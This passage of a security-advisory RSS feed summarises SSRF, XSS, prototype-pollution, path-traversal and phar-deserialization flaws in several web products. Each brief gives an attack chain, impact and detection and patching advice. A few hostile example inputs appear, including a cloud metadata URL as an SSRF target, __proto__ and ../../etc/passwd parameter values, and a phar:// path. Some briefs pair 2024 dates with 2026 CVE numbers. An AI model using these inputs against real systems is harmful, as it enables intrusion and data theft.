<li>The attacker crafts a malicious HTTP request exploiting an identified SSRF vulnerability to probe internal network resources.</li>
<li>Successful SSRF exploitation allows the attacker to identify internal services and gather information about the server architecture.</li>
<li>The attacker leverages an XSS vulnerability by injecting malicious JavaScript code into a cPanel/WHM page.</li>
<li>Unsuspecting users interacting with the compromised page execute the attacker&rsquo;s JavaScript code.</li>
<li>The attacker uses the XSS payload to steal user session cookies or credentials.</li>
<li>The attacker uses the stolen credentials to bypass authentication and gain unauthorized access to cPanel/WHM.</li>
<li>With elevated privileges, the attacker can potentially execute arbitrary code on the server, leading to full system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities can lead to severe consequences. An attacker could gain unauthorized access to sensitive data, including customer databases, configuration files, and source code. XSS attacks could deface websites and phish users. SSRF attacks can expose internal network resources. Remote code execution can lead to complete server takeover and potentially impact a large number of hosted websites and services. This can result in significant financial losses, reputational damage, and legal liabilities.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect Suspicious cPanel/WHM HTTP Request</code> to identify potential SSRF attempts within cPanel/WHM webserver logs.</li>
<li>Deploy the Sigma rule <code>Detect cPanel/WHM XSS Attempt</code> to detect potential XSS payloads being injected into cPanel/WHM.</li>
<li>Closely monitor web server logs for unusual activity originating from cPanel/WHM servers using the <code>webserver</code> category.</li>
<li>Implement strong input validation and output encoding to prevent XSS attacks.</li>
<li>Harden cPanel/WHM configurations to restrict SSRF attack vectors and limit access to internal resources.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cPanel</category><category>WHM</category><category>XSS</category><category>SSRF</category><category>vulnerability</category></item><item><title>Apache CXF Multiple Vulnerabilities Allow Information Disclosure and SSRF</title><link>https://feed.craftedsignal.io/briefs/2026-03-apache-cxf-vulns/</link><pubDate>Tue, 24 Mar 2026 10:20:50 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-apache-cxf-vulns/</guid><description>A remote attacker can exploit multiple vulnerabilities in Apache CXF to disclose information and perform Server-Side Request Forgery (SSRF) attacks.</description><content:encoded><![CDATA[<p>Apache CXF is vulnerable to multiple security flaws that can be exploited by remote attackers. Successful exploitation of these vulnerabilities can lead to sensitive information disclosure and Server-Side Request Forgery (SSRF) attacks. While the specifics of these vulnerabilities are not detailed in this brief, defenders should be aware that applications using Apache CXF may be at risk. Given the potential for significant impact, including the exposure of internal data and the ability to proxy requests through the server, this vulnerability poses a substantial threat and requires immediate attention. Defenders should investigate their exposure and patch or mitigate as soon as possible.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an Apache CXF endpoint exposed to the internet.</li>
<li>The attacker crafts a malicious request to exploit an unspecified vulnerability in Apache CXF.</li>
<li>If successful, the vulnerability allows the attacker to read sensitive information from the server&rsquo;s memory or configuration files.</li>
<li>The attacker leverages a separate vulnerability to perform a Server-Side Request Forgery (SSRF) attack, forcing the server to make requests to internal resources.</li>
<li>The attacker uses the SSRF vulnerability to scan internal networks, identifying other vulnerable systems.</li>
<li>The attacker retrieves sensitive data from internal services via SSRF, such as credentials or internal API keys.</li>
<li>The attacker escalates the attack by leveraging the obtained credentials to access other systems.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of these vulnerabilities can lead to the disclosure of sensitive information, potentially including user credentials, API keys, and internal data structures. The SSRF vulnerability can allow an attacker to access internal systems and services, leading to further compromise of the network. The impact can range from data breaches to complete system compromise, affecting all sectors that rely on Apache CXF for web service implementation.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Inspect web server logs for unusual request patterns targeting Apache CXF endpoints, looking for attempts to access sensitive files or internal resources.</li>
<li>Monitor network traffic for suspicious outbound connections originating from servers running Apache CXF, which might indicate SSRF attempts.</li>
<li>Implement strong input validation and output encoding mechanisms in Apache CXF configurations to prevent information disclosure and SSRF attacks.</li>
<li>Apply all available patches and updates for Apache CXF to remediate known vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>apache-cxf</category><category>ssrf</category><category>information-disclosure</category></item><item><title>DefaultFuction Jeson-Customer-Relationship-Management-System Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-jeson-crm-ssrf/</link><pubDate>Tue, 24 Mar 2026 03:16:06 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-jeson-crm-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in the DefaultFuction Jeson-Customer-Relationship-Management-System's API Module, specifically affecting the /api/System.php file, allowing remote attackers to manipulate the 'url' argument and potentially access internal resources.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-4623, has been discovered in DefaultFuction Jeson-Customer-Relationship-Management-System up to version 1b4679c4d06b90d31dd521c2b000bfdec5a36e00. The vulnerability resides within the API Module, specifically in the /api/System.php file. An attacker can remotely manipulate the &lsquo;url&rsquo; argument, causing the server to make requests to unintended locations. Due to the product&rsquo;s continuous delivery with rolling releases, specific version details are unavailable. A patch to address the vulnerability is identified as f76e7123fe093b8675f88ec8f71725b0dd186310/98bd4eb07fa19d4f2c5228de6395580013c97476. This vulnerability poses a significant risk as it allows attackers to potentially access internal resources, bypass security controls, and potentially escalate privileges.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies an instance of DefaultFuction Jeson-Customer-Relationship-Management-System running version &lt;= 1b4679c4d06b90d31dd521c2b000bfdec5a36e00.</li>
<li>Attacker crafts a malicious HTTP request targeting the <code>/api/System.php</code> endpoint.</li>
<li>The crafted request includes the <code>url</code> parameter, modified to point to an internal resource or external server controlled by the attacker.</li>
<li>The server-side application processes the malicious request without proper validation of the <code>url</code> parameter.</li>
<li>The application initiates an HTTP request to the attacker-controlled URL or internal resource specified in the <code>url</code> parameter.</li>
<li>The server receives the response from the attacker-controlled server or internal resource.</li>
<li>The application may process the response, potentially exposing sensitive information or allowing further exploitation.</li>
<li>If successful, the attacker gains access to sensitive information, internal resources, or the ability to perform actions on behalf of the server.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-4623) can lead to the exposure of sensitive internal data, such as configuration files, database credentials, or API keys. It may also allow attackers to bypass security controls, access internal services not intended for public access, and potentially escalate privileges within the application or the underlying infrastructure. Due to lack of information on the specific scope of usage for this CRM, the total number of potential victims is unclear. Organizations utilizing this vulnerable CRM are at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch identified as f76e7123fe093b8675f88ec8f71725b0dd186310/98bd4eb07fa19d4f2c5228de6395580013c97476 to mitigate the CVE-2026-4623 vulnerability.</li>
<li>Deploy the Sigma rule &ldquo;Detect Jeson CRM System.php SSRF Attempt&rdquo; to your SIEM to detect exploitation attempts against the <code>/api/System.php</code> endpoint.</li>
<li>Implement strict input validation and sanitization on the <code>url</code> parameter within the <code>/api/System.php</code> endpoint to prevent malicious URL manipulation.</li>
<li>Monitor web server logs for suspicious requests to the <code>/api/System.php</code> endpoint, specifically those containing unusual or unexpected URLs in the <code>url</code> parameter, to identify potential exploitation attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>cve-2026-4623</category><category>jeson-crm</category><category>webserver</category></item><item><title>AVideo Unauthenticated Server-Side Request Forgery Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-24-avideo-ssrf/</link><pubDate>Mon, 23 Mar 2026 17:16:51 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-24-avideo-ssrf/</guid><description>AVideo versions up to 26.0 are vulnerable to an unauthenticated server-side request forgery (SSRF) vulnerability in the `plugin/Live/test.php` endpoint, allowing attackers to make the server send arbitrary HTTP requests, potentially exposing internal resources and cloud metadata.</description><content:encoded><![CDATA[<p>AVideo, an open-source video platform, is affected by a critical unauthenticated Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-33502) in versions up to and including 26.0. The vulnerability exists within the <code>plugin/Live/test.php</code> file. An attacker can exploit this flaw to force the AVideo server to make HTTP requests to arbitrary URLs.  Successful exploitation allows attackers to probe internal network services, potentially accessing sensitive internal HTTP resources, cloud metadata endpoints, and other protected assets. The patch for this vulnerability is included in commit 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3. This vulnerability poses a significant risk, as it does not require authentication and can lead to the exposure of sensitive information and potential compromise of internal infrastructure.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an AVideo instance running a vulnerable version (&lt;= 26.0).</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>plugin/Live/test.php</code> endpoint.</li>
<li>The crafted request includes a URL parameter pointing to an internal resource (e.g., <code>http://localhost/admin</code>).</li>
<li>The AVideo server, without proper validation, processes the request and sends an HTTP request to the attacker-specified URL.</li>
<li>The server receives the HTTP response from the internal resource.</li>
<li>The server may return the content of the internal resource to the attacker, depending on the AVideo application logic.</li>
<li>The attacker analyzes the returned content, potentially gaining access to sensitive information like configuration files, API keys, or internal service endpoints.</li>
<li>The attacker leverages the exposed information to further compromise the AVideo instance or the internal network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-33502) can lead to the exposure of sensitive internal resources, including configuration files, API keys, and cloud metadata.  This can enable attackers to gain unauthorized access to internal systems, escalate privileges, and potentially compromise the entire infrastructure. The number of affected AVideo instances is currently unknown, but given its open-source nature, it is potentially widespread across various sectors. A successful attack can lead to data breaches, service disruption, and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade AVideo instances to a patched version containing commit 1e6cf03e93b5a5318204b010ea28440b0d9a5ab3 to remediate CVE-2026-33502.</li>
<li>Deploy the Sigma rule <code>Detect AVideo SSRF Attempt via plugin Live Test</code> to identify potential exploitation attempts targeting the vulnerable endpoint.</li>
<li>Implement network segmentation to restrict access to internal resources and mitigate the impact of successful SSRF exploitation.</li>
<li>Review webserver logs for suspicious requests to <code>plugin/Live/test.php</code> with unusual URL parameters (log source: webserver).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>ssrf</category><category>avideo</category><category>cve-2026-33502</category><category>webserver</category></item><item><title>Monetr Lunch Flow SSRF Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-05-monetr-ssrf/</link><pubDate>Thu, 02 May 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-05-monetr-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability in Monetr's Lunch Flow integration allows authenticated users on self-hosted instances to send HTTP GET requests to arbitrary URLs, potentially exposing sensitive information.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability was identified in the Lunch Flow integration of Monetr, affecting self-hosted instances. This vulnerability allows any authenticated user to cause the Monetr server to issue HTTP GET requests to arbitrary URLs, with the response body from non-200 upstream responses reflected back in the API error message. The URL validator on the <code>POST /api/lunch_flow/link</code> endpoint lacked sufficient filtering, failing to block loopback, RFC1918, link-local, or cloud-provider metadata addresses. This allows attackers to potentially access internal resources or cloud instance metadata. The vulnerability was addressed in Monetr version 1.12.5. The hosted <code>my.monetr.app</code> service is not affected because <code>LunchFlow.Enabled</code> is set to <code>false</code>.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker registers an account on a vulnerable self-hosted Monetr instance where public sign-up is enabled (<code>AllowSignUp=true</code>).</li>
<li>The attacker authenticates to the Monetr instance.</li>
<li>The attacker crafts a malicious <code>POST</code> request to the <code>/api/lunch_flow/link</code> endpoint, providing a URL pointing to an internal resource, such as a cloud metadata endpoint (e.g., <code>http://169.254.169.254/latest/meta-data/</code>).</li>
<li>The Monetr server, due to insufficient URL validation, accepts the malicious URL.</li>
<li>The Monetr server issues an HTTP GET request to the attacker-supplied URL.</li>
<li>The external service or internal resource responds to the Monetr server.</li>
<li>If the response is not a 200 OK, the Monetr server reflects the response body in the API error message within the JSON response to the attacker.</li>
<li>The attacker observes the reflected response body, potentially revealing sensitive information like cloud instance metadata or internal service details.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability can lead to the exposure of sensitive information, such as cloud instance metadata (e.g., AWS EC2 IMDS). This could allow an attacker to gain unauthorized access to other cloud resources or internal systems. The vulnerable instances are self-hosted Monetr deployments running the default configuration with <code>LunchFlow.Enabled=true</code> and <code>AllowSignUp=true</code>. An attacker could also cause a denial-of-service by providing a URL that returns a very large response body, exhausting the server&rsquo;s memory.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to Monetr version <code>v1.12.5</code> or later to patch the SSRF vulnerability. This version introduces a new config field <code>LunchFlow.AllowedApiUrls</code> and caps response body reads at 10 MiB.</li>
<li>For operators who cannot upgrade immediately, set <code>MONETR_ALLOW_SIGN_UP=false</code> to disable public sign-up, limiting access to the vulnerable endpoint to trusted users.</li>
<li>Alternatively, disable Lunch Flow entirely by setting <code>lunchFlow.enabled: false</code> in your config file. This will cause the vulnerable endpoints to return 404.</li>
<li>Implement network-level egress restrictions to limit outbound HTTP traffic from the Monetr pod/container to only <code>lunchflow.app</code> (or other legitimate Lunch Flow hosts), mitigating the SSRF primitive.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>ssrf</category><category>monitr</category><category>github-advisory</category></item><item><title>PhpSpreadsheet SSRF and RCE Vulnerability via IOFactory::load</title><link>https://feed.craftedsignal.io/briefs/2024-01-30-phpspreadsheet-rce-ssrf/</link><pubDate>Tue, 30 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-30-phpspreadsheet-rce-ssrf/</guid><description>PhpSpreadsheet is vulnerable to Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE) due to improper validation of filenames in the IOFactory::load function, exploitable via PHP wrappers like `phar://` and `ftp://`.</description><content:encoded><![CDATA[<p>PhpSpreadsheet, a widely used PHP library for reading and writing spreadsheet files, is susceptible to a critical vulnerability that can lead to both Server-Side Request Forgery (SSRF) and Remote Code Execution (RCE). The vulnerability stems from insufficient validation of the <code>$filename</code> parameter passed to the <code>IOFactory::load</code> function. When this parameter is user-controlled, attackers can leverage PHP wrappers such as <code>ftp://</code>, <code>phar://</code>, and <code>ssh2.sftp://</code> to bypass the <code>is_file</code> check, leading to malicious file inclusion or arbitrary code execution. This flaw affects versions up to and including 1.30.2, as well as versions 2.0.0 through 5.5.0. Exploitation can occur even if the specified file inside the phar archive does not exist or is not a supported file type, potentially masking the attack. Due to PhpSpreadsheet&rsquo;s widespread use in other popular libraries like <code>maatwebsite/excel</code> and <code>sonata-project/exporter</code>, the impact of this vulnerability is significant.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious phar archive (<code>exploit.xlsx</code>) containing a PHP object with a <code>__destruct</code> method that executes arbitrary code via <code>shell_exec</code>.</li>
<li>The attacker hosts the malicious phar archive on a web server or makes it accessible through other means.</li>
<li>The attacker crafts a request to a vulnerable web application using PhpSpreadsheet, providing a <code>phar://</code> URL (e.g., <code>phar://exploit.xlsx/whatever</code>) as the <code>$filename</code> parameter to <code>IOFactory::load</code>.</li>
<li><code>IOFactory::load</code> attempts to load the file specified in the <code>$filename</code> parameter, which passes through the vulnerable <code>is_file</code> check.</li>
<li>The <code>phar://</code> wrapper triggers PHP&rsquo;s phar extension, which deserializes the metadata within the <code>exploit.xlsx</code> archive.</li>
<li>Deserialization of the malicious PHP object triggers the <code>__destruct</code> method, executing the attacker&rsquo;s arbitrary code via <code>shell_exec</code>, achieving RCE. The code creates <code>/tmp/poc.txt</code> in the example.</li>
<li>Alternatively, the attacker provides an <code>ftp://</code> URL to <code>IOFactory::load</code>, pointing to an attacker-controlled FTP server.</li>
<li>The vulnerable <code>is_file</code> check allows the <code>ftp://</code> connection, leading to an SSRF vulnerability where the server running PhpSpreadsheet connects to the attacker&rsquo;s specified FTP server.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability can lead to a range of severe consequences. Remote Code Execution (RCE) allows an attacker to execute arbitrary commands on the server, potentially leading to complete system compromise. The SSRF vulnerability enables an attacker to probe internal network resources, potentially exposing sensitive information or allowing further attacks on internal systems. Given PhpSpreadsheet&rsquo;s use in numerous web applications and frameworks, a successful attack could impact a large number of users and organizations. Example impact includes attackers gaining initial access to internal applications.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the suggested mitigations by either checking for PHP wrappers in the filename before calling <code>is_file</code> or by using <code>realpath</code> to ensure a clean absolute path (see code snippets in the advisory).</li>
<li>Deploy the Sigma rule <code>Detect_PhpSpreadsheet_Phar_Wrapper</code> to detect attempts to exploit the RCE vulnerability by monitoring process creation events with command lines containing &ldquo;phar://&rdquo; and <code>php</code>.</li>
<li>Deploy the Sigma rule <code>Detect_PhpSpreadsheet_Ftp_Wrapper</code> to detect attempts to exploit the SSRF vulnerability by monitoring network connections with destination ports on FTP protocol (21) and file paths contain ftp.</li>
<li>Monitor web server logs for requests containing the <code>phar://</code> or <code>ftp://</code> schemes in the filename parameter to <code>IOFactory::load</code>.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>phpspreadsheet</category><category>ssrf</category><category>rce</category><category>php</category><category>deserialization</category></item><item><title>i18next-http-middleware Prototype Pollution and Path Traversal Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-i18next-http-middleware-vuln/</link><pubDate>Fri, 26 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-i18next-http-middleware-vuln/</guid><description>Versions of i18next-http-middleware before 3.9.3 are vulnerable to prototype pollution, path traversal, and server-side request forgery (SSRF) due to improper validation of user-controlled language and namespace parameters, potentially leading to denial of service or remote code execution.</description><content:encoded><![CDATA[<p>i18next-http-middleware versions prior to 3.9.3 are susceptible to prototype pollution, path traversal, and SSRF attacks. The vulnerability stems from the insufficient validation of the <code>lng</code> (language) and <code>ns</code> (namespace) parameters passed via HTTP requests to the <code>getResourcesHandler</code> and the <code>missingKeyHandler</code>. These handlers, intended to serve localization resources, expose attack surface because they process user-controlled input without proper sanitization. This allows attackers to manipulate object properties, access unintended files or internal services, and cause denial-of-service conditions. The vulnerability was discovered via an internal security audit. Defenders should upgrade to version 3.9.3 to remediate the risks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts an HTTP GET request to the <code>/locales/resources.json</code> endpoint, targeting the <code>getResourcesHandler</code>.</li>
<li>The request includes malicious <code>lng</code> and <code>ns</code> query parameters, such as <code>lng=__proto__&amp;ns=isAdmin</code>, or <code>ns=../../etc/passwd</code>.</li>
<li>The <code>getResourcesHandler</code> extracts the <code>lng</code> and <code>ns</code> parameters without sufficient validation.</li>
<li>The <code>lng</code> and <code>ns</code> values are passed to <code>utils.setPath(resources, [lng, ns], ...)</code> which allows writing to the Object prototype if <code>lng</code> is <code>__proto__</code>.</li>
<li>The <code>lng</code> and <code>ns</code> values are passed to <code>i18next.services.backendConnector.load(languages, namespaces, ...)</code> to load resource bundles. With filesystem or HTTP backends, this can enable path traversal or SSRF if <code>ns</code> or <code>lng</code> contain malicious path segments.</li>
<li>Alternatively, the attacker sends a POST request with a body containing a malicious <code>__proto__</code> key to <code>missingKeyHandler</code>, for example <code>{&quot;__proto__&quot;: {&quot;isAdmin&quot;: true}}</code>.</li>
<li>The <code>missingKeyHandler</code> iterates over the request body using <code>for...in</code>, including inherited prototype properties, and forwards the malicious data into <code>saveMissing</code>.</li>
<li>Successful exploitation leads to prototype pollution, arbitrary file access, SSRF, or denial of service.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can have significant consequences. Prototype pollution allows attackers to manipulate object properties globally, leading to broken authorization checks (e.g., bypassing <code>if (user.isAdmin)</code>), type confusion errors, or potentially remote code execution. Path traversal enables access to sensitive files on the server, like configuration files or password databases, while SSRF allows attackers to interact with internal services. Finally, the unbounded growth of the <code>i18next.options.ns</code> list and repeated backend load calls can lead to denial of service due to memory and CPU exhaustion. This can impact availability of the service and potentially other services on the same host.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to <code>i18next-http-middleware</code> version 3.9.3 or later to address the vulnerabilities.</li>
<li>Deploy the Sigma rules provided below to detect exploitation attempts targeting the <code>getResourcesHandler</code> and <code>missingKeyHandler</code> endpoints.</li>
<li>If upgrading is not immediately feasible, implement a WAF rule as a partial mitigation to block requests containing <code>__proto__</code>, <code>constructor</code>, <code>prototype</code>, <code>..</code>, or control characters in <code>lng</code>/<code>ns</code> query parameters or body keys as suggested in the advisory.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>prototype-pollution</category><category>path-traversal</category><category>ssrf</category><category>denial-of-service</category><category>i18next</category></item><item><title>BigSweetPotatoStudio HyperChat AI Proxy Middleware Server-Side Request Forgery</title><link>https://feed.craftedsignal.io/briefs/2024-01-23-hyperchat-ssrf/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-23-hyperchat-ssrf/</guid><description>A server-side request forgery (SSRF) vulnerability exists in BigSweetPotatoStudio HyperChat up to version 2.0.0-alpha.63, allowing a remote attacker to manipulate the 'baseurl' argument in the 'fetch' function of the AI Proxy Middleware component to make arbitrary HTTP requests.</description><content:encoded><![CDATA[<p>A server-side request forgery (SSRF) vulnerability, identified as CVE-2026-7223, affects BigSweetPotatoStudio HyperChat up to version 2.0.0-alpha.63. The vulnerability resides in the &lsquo;fetch&rsquo; function within the AI Proxy Middleware located at <code>packages/core/src/http/aiProxyMiddleware.mts</code>. By manipulating the <code>baseurl</code> argument, a remote attacker can force the server to make arbitrary HTTP requests to internal or external resources. This issue allows attackers to potentially access sensitive information, bypass security controls, or perform other malicious actions. The vulnerability is remotely exploitable, and a public exploit is available, increasing the risk of widespread exploitation. The project maintainers were notified but have not responded.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies an instance of BigSweetPotatoStudio HyperChat running version 2.0.0-alpha.63 or earlier.</li>
<li>The attacker crafts a malicious HTTP request targeting the AI Proxy Middleware component.</li>
<li>The crafted request includes a manipulated <code>baseurl</code> argument within the request to the <code>fetch</code> function, pointing to an internal resource (e.g., <code>http://localhost:8080/admin</code>) or an external server controlled by the attacker.</li>
<li>The HyperChat server, without proper validation of the <code>baseurl</code>, uses it to make an HTTP request.</li>
<li>If the <code>baseurl</code> points to an internal resource, the server retrieves the content of that resource and sends it back to the attacker.</li>
<li>If the <code>baseurl</code> points to an external server, the server makes a request to the attacker&rsquo;s server, potentially leaking sensitive information in the request headers or body.</li>
<li>The attacker analyzes the response from the server to gather sensitive information or identify further attack vectors.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-7223) can allow an attacker to read sensitive internal data, such as configuration files or API keys, potentially leading to full system compromise. The attacker could also use the vulnerable server as a proxy to scan internal networks or attack other internal systems. Due to the public availability of the exploit, organizations using vulnerable versions of HyperChat are at increased risk of being targeted. The CVSS v3.1 base score for this vulnerability is 7.3, indicating a high severity.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply appropriate input validation and sanitization to the <code>baseurl</code> argument in the AI Proxy Middleware to prevent manipulation, addressing CVE-2026-7223.</li>
<li>Implement network segmentation to restrict access from the HyperChat server to only necessary internal resources.</li>
<li>Deploy the Sigma rule &ldquo;HyperChat SSRF Attempt&rdquo; to detect attempts to exploit the vulnerability via HTTP request patterns.</li>
<li>Monitor web server logs for suspicious outbound connections originating from the HyperChat server, correlating with user input.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>ssrf</category><category>vulnerability</category><category>webserver</category></item><item><title>Royal Elementor Addons Plugin SSRF Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-royal-elementor-ssrf/</link><pubDate>Mon, 08 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-royal-elementor-ssrf/</guid><description>The Royal Elementor Addons plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) allowing authenticated attackers with Contributor-level access or higher to make arbitrary requests and retrieve sensitive information from internal services.</description><content:encoded><![CDATA[<p>The Royal Elementor Addons plugin, a popular WordPress extension, contains a Server-Side Request Forgery (SSRF) vulnerability (CVE-2026-6229) in versions up to and including 1.7.1057. This flaw stems from inadequate validation of user-provided URLs within the <code>render_csv_data()</code> function. Attackers can bypass the validation by including &lsquo;docs.google.com/spreadsheets&rsquo; in a query parameter. The vulnerability is triggered because the plugin uses these URLs in <code>fopen()</code> calls without implementing adequate safeguards to prevent access to internal or private network addresses. This vulnerability enables authenticated attackers with Contributor-level access or higher to craft malicious requests, potentially exposing sensitive internal data. Successful exploitation allows attackers to probe internal network resources, access configuration files, and potentially escalate attacks further.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to the WordPress site with Contributor-level access or higher.</li>
<li>The attacker crafts a malicious HTTP request targeting the vulnerable <code>render_csv_data()</code> function within the Royal Elementor Addons plugin.</li>
<li>The malicious request includes a user-supplied URL containing &lsquo;docs.google.com/spreadsheets&rsquo; within a query parameter to bypass initial validation checks.</li>
<li>The plugin&rsquo;s <code>render_csv_data()</code> function receives the crafted URL without proper sanitization or validation against internal or private network addresses.</li>
<li>The <code>fopen()</code> function is called with the attacker-controlled URL, initiating an outbound request from the WordPress server.</li>
<li>If the URL points to an internal resource, the WordPress server retrieves the resource content.</li>
<li>The attacker receives the content of the internal resource in the response from the WordPress server.</li>
<li>The attacker analyzes the retrieved content for sensitive information, such as configuration files, API keys, or internal service details.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this SSRF vulnerability (CVE-2026-6229) can lead to the exposure of sensitive internal information, potentially impacting all organizations using the Royal Elementor Addons plugin for WordPress version 1.7.1057 and below. This may include internal configuration files, API keys, database credentials, or other sensitive data accessible through internal services. The severity is high due to the potential for attackers to pivot from this vulnerability and further compromise the WordPress server or the internal network.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the Royal Elementor Addons plugin to a version higher than 1.7.1057 to patch CVE-2026-6229.</li>
<li>Deploy the Sigma rule &ldquo;Detect Royal Elementor Addons SSRF Attempt via URL Parameter&rdquo; to identify malicious requests targeting the <code>render_csv_data()</code> function in your web server logs.</li>
<li>Implement strict network segmentation and firewall rules to limit access from the WordPress server to internal resources, mitigating the impact of potential SSRF vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>wordpress</category><category>ssrf</category><category>cve-2026-6229</category><category>plugin</category></item><item><title>Nginx-UI SSRF Vulnerability via Cluster Node Proxy</title><link>https://feed.craftedsignal.io/briefs/2024-01-nginx-ui-ssrf/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-nginx-ui-ssrf/</guid><description>Nginx-UI version 2.3.4 and earlier is vulnerable to Server-Side Request Forgery (SSRF) allowing authenticated users to access internal services by manipulating cluster node configurations.</description><content:encoded><![CDATA[<p>Nginx-UI versions 2.3.4 and earlier contain a Server-Side Request Forgery (SSRF) vulnerability in the cluster node proxy middleware. An authenticated user can exploit this flaw by creating a malicious cluster node that points to an arbitrary internal URL, such as localhost services or cloud metadata endpoints. The vulnerability lies in the lack of validation for the node URL within the <code>internal/middleware/proxy.go</code> file. Successful exploitation allows attackers to bypass network segmentation, access sensitive internal resources, and potentially escalate privileges, especially when combined with other vulnerabilities like njs code injection. This issue allows attackers to reach internal services that should not be exposed.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the Nginx-UI web interface.</li>
<li>Attacker retrieves the <code>node_secret</code> via a <code>GET</code> request to <code>/api/settings</code>.</li>
<li>Attacker crafts a <code>POST</code> request to <code>/api/nodes</code> to create a new cluster node.</li>
<li>The crafted node configuration includes a malicious <code>url</code> parameter pointing to an internal resource (e.g., <code>http://127.0.0.1:51820</code> or <code>http://169.254.169.254</code>).</li>
<li>Attacker sends an API request (e.g., <code>GET /api/settings</code>) with the <code>X-Node-ID</code> header set to the ID of the newly created malicious node.</li>
<li>The Nginx-UI proxy middleware (<code>internal/middleware/proxy.go</code>) intercepts the request and forwards it to the attacker-specified internal URL.</li>
<li>The request is executed on the server-side, effectively performing an SSRF attack.</li>
<li>Attacker gains access to internal resources, cloud metadata, or triggers internal-only njs endpoints.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows an authenticated attacker to access internal services, cloud metadata endpoints, and internal-only njs endpoints. This can lead to the theft of sensitive information such as IAM credentials, port scanning of internal networks, and ultimately, remote code execution and privilege escalation if combined with other vulnerabilities. This vulnerability bypasses network segmentation and firewalls designed to restrict inbound traffic, potentially exposing critical internal resources.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
